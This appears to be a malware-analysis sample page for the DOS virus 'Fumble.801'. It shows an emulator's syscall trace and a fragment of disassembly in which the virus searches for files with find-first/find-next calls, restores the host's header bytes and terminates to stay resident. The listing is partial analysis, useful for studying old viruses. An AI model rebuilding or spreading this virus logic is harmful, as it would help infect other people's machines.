Sample viewer

vx.netlux.org/Virus.DOS.Fumble.801

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:00:10.320808079Z 26 PC: 12a7e | Set disk transfer address
2018-12-17T22:00:10.322863979Z 42 PC: 12a8e | Get date 0x12a8e: test dl, 1
0x12a91: jne 0x12ab0
0x12a93: mov dx, si
0x12a95: add dx, 5
0x12a98: xor cx, cx
0x12a9a: mov ah, 0x4e
0x12a9c: int 0x21
0x12a9e: jb 0x12ab0
0x12aa0: call 0x12aca
0x12aa3: mov dx, si
0x12aa5: add dx, 5
0x12aa8: xor cx, cx
0x12aaa: mov ah, 0x4f
0x12aac: int 0x21
0x12aae: jae 0x12aa0
0x12ab0: mov al, byte ptr [si + 0x12]
0x12ab3: mov byte ptr [0x100], al
0x12ab6: mov ax, word ptr [si + 0x13]
0x12ab9: mov word ptr [0x101], ax
0x12abc: mov dx, 0x80
2018-12-17T22:00:10.325518831Z 26 PC: 12ac3 | Set disk transfer address
2018-12-17T22:00:10.326798739Z 74 PC: 12c64 | Reallocate memory
2018-12-17T22:00:10.328796263Z 49 PC: 12a43 | Terminate and stay resident (Return code = '126' | Memory size = '30')